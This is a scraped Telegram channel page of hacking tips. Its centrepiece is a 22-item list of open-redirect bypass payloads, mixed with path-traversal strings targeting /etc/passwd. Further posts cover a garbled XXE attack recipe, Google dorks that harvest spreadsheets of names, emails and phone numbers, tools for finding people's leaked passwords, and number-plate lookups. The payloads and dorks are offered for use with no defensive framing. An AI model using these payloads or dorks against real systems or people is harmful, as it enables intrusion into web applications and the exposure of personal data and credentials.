Termux All Command [Telegram Group]
Открыть в Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Больше1 328
Подписчики
+524 часа
+177 дней
+5730 день
Архив постов
⚡️SqliSniper: Advanced Time-based Blind SQL Injection fuzzer for HTTP Headers
https://github.com/danialhalo/SqliSniper
☄️You can try this effective manual openredirect Bypass☄️
1. Null-byte injection:
- /google.com%00/
- //google.com%00
2. Base64 encoding variations:
- aHR0cDovL2dvb2dsZS5jb20=
- aHR0cHM6Ly93d3cuZ29vZ2xlLmNvbQ==
- //base64:d3d3Lmdvb2dsZS5jb20=/
3. Case-sensitive variations:
- //GOOGLE.com/
- //GoOgLe.com/
4. Overlong UTF-8 sequences:
- %C0%AE%C0%AE%2F (overlong encoding for ../)
- %C0%AF%C0%AF%2F%2Fgoogle.com
5. Mixed encoding schemes:
- /%68%74%74%70://google.com
- //base64:%32%46%32%46%67%6F%6F%67%6C%65%2E%63%6F%6D
- //base64:%2F%2Fgoogle.com/
6. Alternative domain notations:
- //google.com@127.0.0.1/
- //127.0.0.1.xip.io/
- //0x7F000001/ (hexadecimal IP)
7. Trailing special characters:
- //google.com/#/
- //google.com/;&/
- //google.com/?id=123&//
8. Octal IP address format:
- http://0177.0.0.1/
- http://00177.0000.0000.0001/
9. IP address variants:
- http://3232235777 (decimal notation of an IP)
- http://0xC0A80001 (hex notation of IP)
- http://192.168.1.1/
10. Path traversal with encoding:
- /..%252f..%252f..%252fetc/passwd
- /%252e%252e/%252e%252e/%252e%252e/etc/passwd
- /..%5c..%5c..%5cwindows/system32/cmd.exe
11. Alternate protocol inclusion:
- ftp://google.com/
- javascript:alert(1)//google.com
12. Protocol-relative URLs:
- :////google.com/
- :///google.com/
13. Redirection edge cases:
- //google.com/?q=//bing.com/
- //google.com?q=https://another-site.com/
14. IPv6 notation:
- http://[::1]/
- http://[::ffff:192.168.1.1]/
15. Double URL encoding:
- %252f%252fgoogle.com (encoded twice)
- %255cgoogle.com
16. Combined traversal & encoding:
- /%2E%2E/%2E%2E/etc/passwd
- /%2e%2e%5c%2e%2e/etc/passwd
17. Reverse DNS-based:
- https://google.com.reverselookup.com
- //lookup-reversed.google.com/
18. Non-standard ports:
- http://google.com:81/
- https://google.com:444/
19. Unicode obfuscation in paths:
- /%E2%80%8Egoogle.com/
- /%C2%A0google.com/
20. Query parameters obfuscation:
- //google.com/?q=http://another-site.com/
- //google.com/?redirect=https://google.com/
21. Using @ symbol for userinfo:
- https://admin:password@google.com/
- http://@google.com
22. Combination of userinfo and traversal:
- https://admin:password@google.com/../../etc/passwd
Google Dork
site:target.com ext:xlsx "name" "@gmail.com" "phone"
GoSearch - OSINT tool for searching people's digital footprint and leaked passwords across various social networks, written in Go.
GitHub: https://github.com/ibnaleem/gosearch
Keywords_Everywhere_Keyword_Tool_Chrome_Web_Store_11_30_0_0.crx7.77 KB
🔰 Summarize YouTube Videos Ultimately 🔰
First, add this extension on your browser
https://keywordseverywhere.com/
Then open YouTube and see on the right side you will see 3 options use ChatGPT, use Claude, and use Gemini
you can use any of them among 3 Summarize Videos and Save your precious time!
Bug Bounty Tip : XML External Entity(XXE)
1.Go to the file upload functionality in the application.
2.Upload a XML file
]>
&xxe;
3.Use Burp Suite to intercept the request and modify content type.
hashtag#bugbounty
Nmap all collection : https://github.com/emadshanab/Nmap-NSE-scripts-collection
XXEinjector
Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods.
TOOL GITHUB LINK: https://lnkd.in/fB3_S6d
dnsReaper
dnsReaper: subdomain takeover tool for attackers, bug bounty hunters and the blue team
TOOL GITHUB LINK: https://lnkd.in/e-39S78D
📍List of tips I shared on X recently
🪲Google Dorks
site:*.redacted[.]com inurl:web inurl:guest
site:*.redacted[.]com "Welcome to" "Sign in with Microsoft"
site:*.redacted[.]com inurl:debug inurl:&
site:*.redacted[.]com inurl:debug inurl:?
site:*.redacted[.]com inurl:debug inurl:=
site:*.redacted[.]com inurl:debug inurl:true
⛏️Add to your wordlist
/tunnel-web/secure/webdav
/tunnel-web/secure/webdav/guest
/gsm
🔍Waymore Grep
cat urls.txt | grep "debug="
🤖Prompts
[1] I have 20 urls that contains the keyword "rss", any specific vulnerability you would suggest here to test first?
[2] Ok, now explain the vulnerability testing procedure using detailed request and response application flow
[3] Ok, any hidden test case not tested by majority and overlooked?
🐞Learn Bing Dorking
[1] https://lnkd.in/g92WC4HW
[2] https://lnkd.in/g2HBqZ2S
[3] https://lnkd.in/gmKJ-b3e
[4] https://lnkd.in/gP553puY
💉Learn SPARQL Injection
[1] https://lnkd.in/gT9e77iz
[2] https://lnkd.in/gUmmFveY
[3] https://lnkd.in/gXfXmzZu
[4] https://lnkd.in/gNtE9Pr4
⚡️NucleiFuzzer: An advanced automation tool for streamlined web app security testing. Combines powerful tools like ParamSpider, Waybackurls, Katana, Gauplus, and Hakrawler for effective URL discovery and vulnerability scanning.
✅Link: https://lnkd.in/gUC2piPz
#𝗢𝗦𝗜𝗡𝗧 𝗧𝗶𝗽: 𝗦𝗲𝗮𝗿𝗰𝗵𝗶𝗻𝗴 𝗣𝗮𝗿𝘁𝗶𝗮𝗹 𝗡𝘂𝗺𝗯𝗲𝗿 𝗣𝗹𝗮𝘁𝗲𝘀 𝗶𝗻 𝘁𝗵𝗲 𝗨𝗞 🚗🔎
Did you know you can search for UK number plates even with partial information? Using a '?' as a wildcard for up to two unknown characters, you can retrieve results showing the vehicle’s full registration, colour, make, and tax/MOT status.
When combined with an image, filtering by colour and make is a powerful technique to identify the correct registration.
🔗 Explore the tool: https://lnkd.in/dbjN5W9p
I found an Information Disclosure Vulnerability in a public target on HackerOne in just 2 minutes🎯
How I did it :
First, I used Subfinder to gather all subdomains (Tip: Always configure your API keys for the best results).
Then I used the httpx-toolkit tool to collect all subdomains returning a 404 status code into one file.
Then I ran ffuf with my custom wordlist on the 404 subdomains, which revealed
interesting URLs:
https://subdomain.[target].com/humans.txt
When I opened it, I found the developers' names and credentials, as well as all the technologies the website uses, including the version of PHP and more.
So, make sure to add /humans.txt/ to your wordlist!
Bug Bounty Writeups : https://github.com/x1337loser/bug-bounty-writeup
